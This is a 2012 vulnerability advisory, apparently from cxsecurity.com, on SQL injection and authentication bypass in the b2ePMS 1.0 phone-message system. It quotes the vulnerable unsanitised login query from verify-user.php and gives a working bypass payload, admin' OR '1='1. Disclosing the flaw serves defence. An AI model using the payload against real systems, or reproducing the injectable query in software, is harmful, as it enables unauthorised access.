b2ePMS 1.0 SQL Injection

2012.05.15
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################# b2ePMS 1.0 Authentication Bypass Vulnerability ################################################# Discovered by: Jean Pascal Pereira <pereira@secbiz.de> Vendor Information: "b2ePMS stands for Browser to Email Phone Message System. It is intended to replace the standard paper/carbon phone message slips commonly used in offices, with the capability of sending the message via a web browser form directly to the recipients inbox." Vendor URI: https://developer.berlios.de/projects/b2epms/ ################################################# Issue: SQL Injection, Authentication Bypass Risk level: High => The remote attacker has the possibility to execute arbitrary SQL Code. => The remote attacker is able to bypass the user authentication. In verify-user.php, line 20: ------------------------------------- $sql = mysql_query("SELECT * FROM b2epms_user WHERE username='$username' AND user_passwd='$admin_passwd' AND activated='1' AND user_level='2'"); $login_check = mysql_num_rows($sql); if($login_check > 0){ while($row = mysql_fetch_array($sql)){ foreach( $row AS $key => $val ){ $$key = stripslashes( $val ); } // Register session variables! session_register('userid'); $_SESSION['userid'] = $user_level; mysql_query("UPDATE b2epms_user SET login_date=now() WHERE userid='$userid'"); $url = "Location: admin.php"; header($url); } } ------------------------------------- Exploit / Proof Of Concept: Perform a login with the following data: Username: admin' OR '1='1 Password: x ------------------------------------- #################################################

References:

https://developer.berlios.de/projects/b2epms/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top